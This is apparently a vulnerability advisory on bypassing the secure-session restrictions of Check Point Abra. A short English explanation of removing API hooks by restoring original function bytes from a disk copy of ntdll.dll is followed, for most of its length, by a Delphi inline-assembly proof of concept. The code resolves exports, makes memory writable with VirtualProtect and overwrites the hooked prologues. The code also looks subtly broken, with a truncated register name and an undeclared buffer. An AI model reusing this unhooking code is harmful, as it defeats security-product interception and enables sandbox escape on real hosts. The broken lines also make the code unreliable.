Check Point Abra安全限制绕过和信息泄露漏洞(2)

It is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).

Technique, for example, can allow making changes to files \ Registry of the secure session directly to the host system.

procedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);
var
var_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;
begin
asm
  pushad
   mov     eax, [mapped_dll_base]
   mov     ecx, [eax+3Ch]
   mov     edx, [mapped_dll_base]
   lea     eax, [edx+ecx+18h]
   mov     [var_10], eax
   mov     ecx, [var_10]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+60h]
   mov     [var_4], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+1Ch]
   mov     [var_8], ecx
   mov     ecx, [var_4]
   mov     edx, [mapped_dll_base]
   add     edx, [ecx+20h]
   mov     [var_20], edx
   mov     eax, [var_4]
   mov     ecx, [mapped_dll_base]
   add     ecx, [eax+24h]
   mov     [var_2C], ec
   push    dllname
   call    LoadLibrary
   mov     [var_28], eax
   cmp     [var_28], 0
   jne     @loc_41D111
   jmp     @ending
@loc_41D111:
   mov     [var_24], 0
   jmp     @loc_41D135
@loc_41D11A:
   mov     eax, [var_24]
   add     eax, 1
   mov     [var_24], eax
   mov     ecx, [var_20]
   add     ecx, 4
   mov     [var_20], ecx
   mov     edx, [var_2C]
   add     edx, 2
   mov     [var_2C], edx
@loc_41D135:
   mov     eax, [var_4]
   mov     ecx, [var_24]
   cmp     ecx, [eax+18h]
   jnb     @ending
   mov     ecx, [var_24]
   mov     edx, [var_20]
   mov     eax, [mapped_dll_base]
   add     eax, [edx]
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [var_28]
   add     eax, [edx+ecx*4]
   mov     [var_3C], eax
   mov     ecx, [var_24]
   mov     edx, [var_8]
   mov     eax, [mapped_dll_base]
   add     eax, [edx+ecx*4]
   mov     [Src], eax
   push    0Ah
   mov     ecx, [Src]
   push    ecx
   lea     edx, [Dst]
   push    edx
   call    memcpy
   add     esp, 0Ch
   lea     eax, [old]
   push    eax
   push    PAGE_EXECUTE_READWRITE
   push    0Ah
   mov     eax, [var_3C]
   push    eax
   call    VirtualProtect
   push    0Ah
   lea     ecx, [Dst]
   push    ecx
   mov     eax, [var_3C]
   push    eax
   call    memcpy
   add     esp, 0Ch
   jmp     @loc_41D11A
@ending:
  popad
end;
end;